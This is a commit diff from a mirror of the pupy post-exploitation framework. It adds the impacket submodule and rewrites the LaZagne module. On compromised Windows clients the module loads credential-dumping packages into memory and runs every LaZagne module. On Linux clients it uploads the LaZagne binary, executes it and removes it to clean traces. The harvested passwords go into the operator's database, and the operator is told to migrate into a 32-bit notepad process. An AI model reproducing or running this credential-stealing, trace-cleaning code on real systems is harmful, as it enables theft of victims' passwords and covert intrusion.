mirror of https://github.com/n1nj4sec/pupy.git
In-memory LaZagne module from AlessandroZ
This commit is contained in:
parent
d00ed46a91
commit
f0e60a7606
|
@ -10,3 +10,7 @@
|
||||||
path = pupy/external/LaZagne
|
path = pupy/external/LaZagne
|
||||||
url = https://github.com/AlessandroZ/LaZagne
|
url = https://github.com/AlessandroZ/LaZagne
|
||||||
shallow = true
|
shallow = true
|
||||||
|
[submodule "pupy/external/impacket"]
|
||||||
|
path = pupy/external/impacket
|
||||||
|
url = https://github.com/CoreSecurity/impacket
|
||||||
|
shallow = true
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 8af9271f656b6d420466f8bcaec8b81253388340
|
|
@ -1,4 +1,6 @@
|
||||||
# -*- coding: UTF8 -*-
|
# -*- coding: UTF8 -*-
|
||||||
|
# Author: AlessandroZ
|
||||||
|
|
||||||
from pupylib.PupyModule import *
|
from pupylib.PupyModule import *
|
||||||
from pupylib.PupyCompleter import *
|
from pupylib.PupyCompleter import *
|
||||||
from rpyc.utils.classic import upload
|
from rpyc.utils.classic import upload
|
||||||
|
@ -6,6 +8,7 @@ from pupylib.utils.credentials import Credentials
|
||||||
import tempfile
|
import tempfile
|
||||||
import subprocess
|
import subprocess
|
||||||
import os.path
|
import os.path
|
||||||
|
from pupylib.utils.rpyc_utils import redirected_stdo
|
||||||
|
|
||||||
__class_name__="LaZagne"
|
__class_name__="LaZagne"
|
||||||
|
|
||||||
|
@ -16,56 +19,100 @@ class LaZagne(PupyModule):
|
||||||
"""
|
"""
|
||||||
def init_argparse(self):
|
def init_argparse(self):
|
||||||
self.arg_parser = PupyArgumentParser(prog="lazagne", description=self.__doc__)
|
self.arg_parser = PupyArgumentParser(prog="lazagne", description=self.__doc__)
|
||||||
|
self.arg_parser.add_argument("-v", "--verbose", action='store_true')
|
||||||
|
|
||||||
def run(self, args):
|
def run(self, args):
|
||||||
platform=self.client.desc["platform"]
|
platform=self.client.desc["platform"]
|
||||||
isWindows = True
|
|
||||||
if "Windows" in platform:
|
if "Windows" in platform:
|
||||||
lazagne_path = self.client.pupsrv.config.get("lazagne","win")
|
if "64" in self.client.desc["proc_arch"]:
|
||||||
|
self.error('Not yet implemented for a x64 bits process, migrate to a 32 bits process and try again ! \nEx: run migrate -c \'C:\\Windows\\SysWOW64\\notepad.exe\'')
|
||||||
|
return
|
||||||
|
|
||||||
|
# load all dependency
|
||||||
|
self.client.load_dll(os.path.abspath(os.path.join(os.path.dirname(__file__),"..", "packages", "windows", "x86", "sqlite3.dll")))
|
||||||
|
self.client.load_package("sqlite3")
|
||||||
|
self.client.load_package("_sqlite3")
|
||||||
|
self.client.load_package("xml")
|
||||||
|
self.client.load_package("_elementtree")
|
||||||
|
self.client.load_package("pyexpat") # needed for _elementtree module
|
||||||
|
self.client.load_package("win32crypt")
|
||||||
|
self.client.load_package("win32api")
|
||||||
|
self.client.load_package("win32con")
|
||||||
|
self.client.load_package("win32cred")
|
||||||
|
self.client.load_package("colorama")
|
||||||
|
self.client.load_package("impacket")
|
||||||
|
self.client.load_package("calendar")
|
||||||
|
self.client.load_package("win32security")
|
||||||
|
self.client.load_package("win32net")
|
||||||
|
self.client.load_package("lazagne")
|
||||||
|
|
||||||
|
db = Credentials()
|
||||||
|
|
||||||
|
moduleNames = self.client.conn.modules["lazagne.config.manageModules"].get_modules()
|
||||||
|
for module in moduleNames:
|
||||||
|
if args.verbose:
|
||||||
|
self.info("running module %s"%(str(module).split(' ',1)[0].strip('<')))
|
||||||
|
passwords = module.run(module.options['dest'].capitalize())
|
||||||
|
self.print_results(module.options['dest'].capitalize(), passwords, db)
|
||||||
|
|
||||||
elif "Linux" in platform:
|
elif "Linux" in platform:
|
||||||
isWindows = False
|
isWindows = False
|
||||||
if "64" in self.client.desc["os_arch"]:
|
if "64" in self.client.desc["os_arch"]:
|
||||||
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_64")
|
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_64")
|
||||||
else:
|
else:
|
||||||
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_32")
|
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_32")
|
||||||
else:
|
|
||||||
self.error("Platform not supported")
|
if not os.path.isfile(lazagne_path):
|
||||||
return
|
self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path)
|
||||||
|
self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases')
|
||||||
|
return
|
||||||
|
|
||||||
|
tf = tempfile.NamedTemporaryFile()
|
||||||
|
dst = tf.name
|
||||||
|
tf.file.close()
|
||||||
|
|
||||||
if not os.path.isfile(lazagne_path):
|
self.success("Uploading laZagne to: %s" % dst)
|
||||||
self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path)
|
upload(self.client.conn, lazagne_path, dst)
|
||||||
self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases')
|
|
||||||
return
|
|
||||||
|
|
||||||
tf = tempfile.NamedTemporaryFile()
|
|
||||||
dst = tf.name
|
|
||||||
if isWindows:
|
|
||||||
remoteTempFolder = self.client.conn.modules['os.path'].expandvars("%TEMP%")
|
|
||||||
tfName = tf.name.split(os.sep)
|
|
||||||
tfName = tfName[len(tfName)-1] + '.exe'
|
|
||||||
dst = self.client.conn.modules['os.path'].join(remoteTempFolder, tfName)
|
|
||||||
tf.file.close()
|
|
||||||
|
|
||||||
self.success("Uploading laZagne to: %s" % dst)
|
|
||||||
upload(self.client.conn, lazagne_path, dst)
|
|
||||||
|
|
||||||
if not isWindows:
|
|
||||||
self.success("Adding execution permission")
|
self.success("Adding execution permission")
|
||||||
cmd = ["chmod", "+x", dst]
|
cmd = ["chmod", "+x", dst]
|
||||||
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
|
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
|
||||||
|
|
||||||
self.success("Executing")
|
self.success("Executing")
|
||||||
cmd = [dst, "all"]
|
cmd = [dst, "all"]
|
||||||
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
|
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
|
||||||
self.success("%s" % output)
|
self.success("%s" % output)
|
||||||
|
|
||||||
creds = self.parse_output(output)
|
creds = self.parse_output(output)
|
||||||
db = Credentials()
|
db = Credentials()
|
||||||
db.add(creds)
|
db.add(creds)
|
||||||
self.success("Passwords stored on the database")
|
self.success("Passwords stored on the database")
|
||||||
|
|
||||||
self.success("Cleaning traces")
|
self.success("Cleaning traces")
|
||||||
self.client.conn.modules['os'].remove(dst)
|
self.client.conn.modules['os'].remove(dst)
|
||||||
|
|
||||||
|
else:
|
||||||
|
self.error("Platform not supported")
|
||||||
|
return
|
||||||
|
|
||||||
|
def print_results(self, module, creds, db):
|
||||||
|
if creds:
|
||||||
|
print "\n############## %s passwords ##############\n" % module
|
||||||
|
clean_creds = []
|
||||||
|
for cred in creds:
|
||||||
|
clean_cred = {}
|
||||||
|
clean_cred['Tool'] = 'Lazagne'
|
||||||
|
for c in cred.keys():
|
||||||
|
clean_cred[c] = cred[c].encode('utf-8')
|
||||||
|
print "%s: %s" % (c, cred[c])
|
||||||
|
print
|
||||||
|
clean_creds.append(clean_cred)
|
||||||
|
|
||||||
|
try:
|
||||||
|
db.add(clean_creds)
|
||||||
|
self.success("Passwords stored on the database")
|
||||||
|
except Exception, e:
|
||||||
|
print e
|
||||||
|
|
||||||
def parse_output(self, output):
|
def parse_output(self, output):
|
||||||
creds = []
|
creds = []
|
||||||
|
@ -110,5 +157,5 @@ class LaZagne(PupyModule):
|
||||||
key, value = line.split(':', 1)
|
key, value = line.split(':', 1)
|
||||||
cred[key] = value.strip()
|
cred[key] = value.strip()
|
||||||
except:
|
except:
|
||||||
pass
|
pass
|
||||||
return creds
|
return creds
|
||||||
|
|
Loading…
Reference in New Issue